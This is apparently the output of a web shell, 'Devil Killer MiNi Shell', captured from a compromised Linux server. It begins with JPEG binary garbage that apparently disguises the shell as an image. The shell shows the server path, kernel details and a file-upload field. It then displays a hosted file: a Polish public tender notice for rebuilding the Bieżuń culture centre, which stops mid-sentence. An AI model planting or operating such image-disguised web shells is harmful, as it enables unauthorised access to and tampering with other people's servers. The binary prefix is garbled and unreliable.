JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240705/0040004101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa wraz z nadbudową i przebudową budynku Miejsko-Gminnego Ośrodka Kultury w Bieżuniu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Bieżuń</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 130377913</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Warszawska 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bieżuń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-320</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL922 - Ciechanowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48236578056</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48236578039</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">umig@biezun.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.biezun.nv.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa wraz z nadbudową i przebudową budynku Miejsko-Gminnego Ośrodka Kultury w Bieżuniu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-82a336fe-3ab9-11ef-880f-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00400041</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00010964/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Rozbudowa wraz z nadbudową i przebudową budynku Miejsko-Gminnego Ośrodka Kultury w Bieżuniu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/951033 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/951033</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/transakcja/951033<br/>W celu skrócenia czasu udzielenia odpowiedzi na pytania komunikacja między zamawiającym a wykonawcami w zakresie: pytań,<br/>odpowiedzi, wniosków, odwołań odbywa się za pośrednictwem platformazakupowa.pl i formularza &#34;Wyślij wiadomość do<br/>zamawiającego&#34;<br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się<br/>komunikat, że wiadomość została wysłana do zamawiającego.<br/>Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem platformazakupowa.pl. Informacje dotyczące<br/>odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na<br/>platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny<br/>wykonawca, będzie przekazywana za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.<br/>Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/>platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może<br/>trafić do folderu SPAM.<br/>Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.<br/>Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl,<br/>w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie<br/>oferty w zakładce „Wyślij wiadomość do zamawiającego”).<br/>Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym<br/>postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 Ustawy Prawo Zamówień Publicznych.<br/>Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>Więcej informacji dot. komunikacji elektronicznej określa SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych) zwanego dalej Rozporządzeniem „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Burmistrz Miasta i Gminy Bieżuń, ul. Warszawska 2, 09-320 Bieżuń;<br/>	z Inspektorem ochrony danych osobowych w Urzędzie Miasta i Gminy Bieżuń, ul. Warszawska 2, 09-320 Bieżuń można się skontaktować poprzez email: iod@biezun.pl <br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego PRZPiFP.271.1.10.2024 prowadzonym w trybie podstawowym;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t.j. Dz. U. z 2023 poz. 1605 ze zm.) oraz mogą to być podmioty przetwarzające dane w naszym imieniu – firmy świadczące usługi utrzymania naszych systemów teleinformatycznych; <br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/><br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PRZPiFP.271.1.10.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Rozbudowa wraz z nadbudową i przebudową budynku Miejsko – Gminnego Ośrodka Kultury w Bieżuniu” <br/>Charakterystyka budynku:<br/>- kubatura 2 388,19m3<br/>- pow. zabudowy 364,74m2<br/>- pow. użytkowa 764,00 m2<br/>- budynek jest zlokalizowany w strefie ochrony konserwatorskiej<br/>- budynek położony na terenie objętym MPZP<br/>Informacje o terenie: <br/>Teren na którym planowana jest inwestycja to działka nr 1185/1 w obrębie 0001 Bieżuń przy ul. Mławskiej 5 w Bieżuniu, sąsiadująca z drogą wojewódzką nr 541 oraz drogą gminną nr 460146W ( ul. Nadwkrzańska). <br/>Wymagany zakres robót:<br/>a) Elementy przeznaczone do rozbiórki<br/>- spocznik wraz z pochylnią przy wejściu do budynku od ul. Mławskiej,<br/>- płyta betonowa wykończona lastriko zlokalizowana od ul. Mławskiej<br/>- likwidacja terenu utwardzonego z kostki brukowej wraz z krawężnikami( teren ukształtowany jako schody wyjścia z klatki i Sali widowiskowej) od ul. Nadwkrzańskiej,<br/>- likwidacja krawężnika wzdłuż elewacji od ul. Nadwkrzańskiej,<br/>- rozbiórka fragmentu chodnika w celu wykonania izolacji przeciwwilgociowych ścian fundamentowych.<br/>b) Prace przygotowawcze i rozbiórkowe<br/>- demontaż wszelkich elementów ruchomego wyposażenia budynku ( tj. meble, tablice informacyjne itp.),<br/>- demontaż orynnowania i rur spustowych wraz z obróbkami blacharskimi,<br/>- demontaż istniejącego docieplenia ze styropianu zewnętrznego oraz ściany szczytowej od wewnątrz budynku na scenie,<br/>- demontaż poszycia dachowego wraz z konstrukcją dachu,<br/>- rozbiórka murków attyki,<br/>- usunięcie warstw docieplenia z wełny mineralnej, <br/>- rozbiórka stropu nad 1 piętrem,<br/>- demontaż stolarki okiennej i drzwiowej,<br/>- skucie tynków (100%),<br/>- demontaż warstw posadzkowych (100%),<br/>- demontaż wszelkich instalacji wewnętrznych,<br/>- demontaż biegów schodowych w istniejącej klatce schodowej wraz ze spocznikami i poręczami,<br/>- rozbiórka ściany klatki schodowej w osi nr 3,<br/>- usunięcie fragmentów stropu w okolicy projektowanej windy (pomiędzy parterem a 1 piętrem),<br/>- rozbiórka ściany szczytowej na 1 piętrze w pomieszczeniu biura dyrektora pom. 1.5,<br/>- wykucie nowych otworów pod projektowaną stolarkę drzwiową po uprzednim zabudowaniu nadproży stalowych wg projektu konstrukcji,<br/>- demontaż podłóg na gruncie( wszystkie warstwy),<br/>- usunięcie ziemi pod projektowany szyb windy( należy sprawdzić głębokość posadowienia istniejących ław fundamentowych, jeśli zajdzie taka potrzeba to należy wykonać podbudowę ław w systemie odcinkowym),<br/>- okopanie budynku z zewnątrz w koło w celu wykonania izolacji przeciwwilgociowych ścian fundamentowych,<br/>- usunięcie warstwy ziemi pod projektowane podłogi na gruncie.<br/>c) Roboty nadbudowy i przebudowy<br/>- wykonanie ław fundamentowych pod projektowaną ścianę klatki schodowej, <br/>- wykonanie płyty fundamentowej pod projektowany szyb windowy,<br/>- wykonanie warstw pod podłogi na gruncie ( pod płytę żelbetową gr. 15 cm),<br/>- wykonanie ściany projektowanej ściany żelbetowej klatki schodowej( postępując od dołu do góry etapami),<br/>- wykonanie biegów schodowych klatki schodowej ( postępując od dołu do góry etapami),<br/>- wykonanie ścian żelbetowych szybu windowego ( postępując od dołu do góry etapami),<br/>- wykonanie konstrukcji stropu korytarza spinającego projektowaną klatkę schodową z istniejącym budynkiem na poziomie 1 piętra,<br/>- wykonanie konstrukcji wsporczej stropu w okolicy szybu windy pod przechodzące instalacje wentylacji mechanicznej,<br/>- wykonanie podkonstrukcji wsporczej podpierającej strop pomiędzy wentylatorownią zlokalizowaną w piwnicy a sceną ( wg projektu konstrukcji),<br/>- wykonanie miejscowych zamurowań otworów po byłych oknach, drzwiach zgodnie z projektem zmian, <br/>- wykonanie izolacji przeciwwilgociowej ścian fundamentowych, wykonanie docieplenia i odtworzenie terenu wokół budynku,<br/>-zabudowa projektowanych nadproży stalowych w ścianach nośnych,<br/>- wykonanie stropu żelbetowego nad 1 piętrem zgodnie z projektem konstrukcji,<br/>- budowa ścian konstrukcyjnych 2 piętra wraz z nadprożami nad oknami i drzwiami,<br/>- budowa stropu żelbetowego nad 2 piętrem stanowiący podparcie dachu,<br/>- murowanie ścian attyk,<br/>- wykonanie ścian działowych murowanych i szkieletowych na wszystkich kondygnacjach zgodnie z projektem,<br/>- wykonanie konstrukcji dachu wraz z zabudową podstaw dystansowych pod projektowane okna dachowe( wraz z dociepleniem),<br/>- montaż stolarki okiennej i drzwiowej zewnętrznej,<br/>- zabudowa słupów konstrukcyjnych pod projektowane żaluzje techniczne,<br/>- wykonanie warstw posadzkowych projektowanego tarasu zewnętrznego,<br/>- wykonanie projektowanego docieplenia elewacji budynku wraz ze wszelkimi elementami( parapety, kratki wentylacyjne itp.),<br/>- zabudowa okien dachowych i klapy oddymiającej w dachu,<br/>- zabudowa wszelkich obróbek blacharskich wraz z orynnowaniem i rurami spustowymi,<br/>- wykonanie poszycia papowego dachu po uprzednim zamontowaniu wszelkich wywiewek kanalizacyjnych uwzględniając projektowany dach zielony,<br/>- zabudowa podkonstrukcji wsporczej pod projektowane panele instalacji fotowoltaicznej wg projektu instalacji elektrycznych,<br/>- po uprzedniej instalacji urządzeń technicznych na tarasie zabudowa żaluzji technicznych.<br/>d) Roboty wykończeniowe<br/>- roboty instalacyjne wg załączonych projektów branżowych,<br/>- wykonanie tynków wewnętrznych za wyjątkiem stropów w miejscu sufitów podwieszanych,<br/>- otynkowanie stropu gęstożebrowego między parterem a 1 piętrem w okolicy korytarza głównego,<br/>- wykonanie warstw posadzkowych,<br/>- zabudowa stolarki wewnętrznej drzwiowej,<br/>- wykonanie biegu schodowego przy wejściu na salę od strony wejścia głównego ( w sali widowiskowej),<br/>- wykonanie konstrukcji pod projektowany balkon (stanowisko akustyka),<br/>- wykonanie projektowanego frontu sceny wraz ze schodami na scenę i zabudową platformy windowej dla osób NPS (wjazd niepełnosprawnych na scenę),<br/>- wykonanie poszczególnych warstw posadzkowych sceny jako całość,<br/>- wykonanie remontu istniejącej posadzki schodkowej ( naprawa stopni, wyrównanie powierzchni stopni, przygotowanie powierzchni pod wykładziny dywanowe),<br/>- zabudowa akustyczna ścian i sufitu wg projektu akustyki po uprzedniej zabudowie niezbędnych instalacji ( wg projektów branżowych)<br/>- montaż sufitów podwieszonych wg opisu pomieszczeń po uprzedniej zabudowie niezbędnych instalacji,<br/>- wykończenie posadzek wg opisu pomieszczeń,<br/>- zabudowa mechaniki windy wraz z drzwiami szybu windowego ( jako komplet),<br/>- zabudowa poręczy projektowanej klatki schodowej, balkonu akustyka i widowni w okolicy wejścia głównego do sali widowiskowej,<br/>- zabudowa platformy poręczowej dla NPS przy wejściu głównym do sali widowiskowej,<br/>- malowanie ścian wewnętrznych,<br/>- dostawa i montaż sprzętu nagłośnieniowego oraz oświetleniowego w sali widowiskowej wg projektu akustyki,<br/>- zabudowa materiałów wykończeniowych ( wykładzina dywanowa),<br/>- dostawa i montaż foteli do sali widowiskowej,<br/>e) Projektowe rozwiązania materiałowe zgodnie z projektem wykonawczym, materiały wykończeniowe muszą posiadać atesty i aprobaty ITB i PZH dopuszczające je do stosowania w budownictwie służby zdrowia.<br/>f) Instalacje wewnętrzne wg załączonych projektów branżowych.<br/><br/>W zakres zamówienia wchodzą wszystkie prace, czynności oraz roboty, które należy zrealizować by przedmiot zamówienia osiągnął gotowość do użytkowania i eksploatacji, by został wykonany należycie, zgodnie z obowiązującymi normami i przepisami prawa, sztuką budowlaną, zasadami współczesnej wiedzy technicznej i uzgodnieniami dokonanymi w trakcie realizacji robót.<br/><br/><br/>3.2 Szczegółowy opis przedmiotu zamówienia zawierają załączniki do SWZ:<br/>Załącznik nr 10 do SWZ – dokumentacja projektowa (w tym: projekty budowlane, projekty branżowe, projekty techniczne, projekty wykonawcze, specyfikacje techniczne wykonania i odbioru robót budowlanych (STWiORB), przedmiary robót)<br/>Wykonawca winien obliczyć wartość robót na podstawie załączonej dokumentacji projektowej. <br/><br/>Załączone przedmiary robót są materiałem pomocniczym do wyliczenia ceny ryczałtowej oferty, a ewentualne nieujęte w nich elementy robót wynikające z projektu nie mogą stanowić podstawy do żądania przez Wykonawcę dodatkowego wynagrodzenia.<br/>3.4 Wykonawca zobowiązany jest do:<br/>3.4.1. Opracowania i przekazania Zamawiającemu harmonogramu rzeczowo-finansowego w terminie 7 dni od dnia zawarcia umowy, zwanego dalej „harmonogramem” <br/>a)	Terminy rozpoczęcia i zakończenia realizacji poszczególnych etapów rozliczeniowych;<br/>b)	Wartość robót przewidzianych w każdym etapie rozliczeniowym;<br/>c)	Zakres robót do wykonania w każdym etapie rozliczeniowym;<br/>d)	Datę zakończenia realizacji robót;<br/>e)	Datę zgłoszenia robót do odbioru.<br/>Zmiana harmonogramu wymaga uzyskania każdorazowej akceptacji przez Zamawiającego i Inspektora nadzoru inwestorskiego. Inspektor nadzoru inwestorskiego dokonuje weryfikacji i akceptuje lub przekazuje uwagi do harmonogramu w terminie 7 dni od dnia przedłożenia harmonogramu przez Wykonawcę, a następnie ostatecznie zaakceptowany harmonogram przekazuje Zamawiającemu,<br/>3.4.2. Przedłożenia na 2 dni przed podpisaniem umowy kosztorysów ofertowych (zgodnych z ceną podaną w formularzu ofertowym) z uwzględnieniem 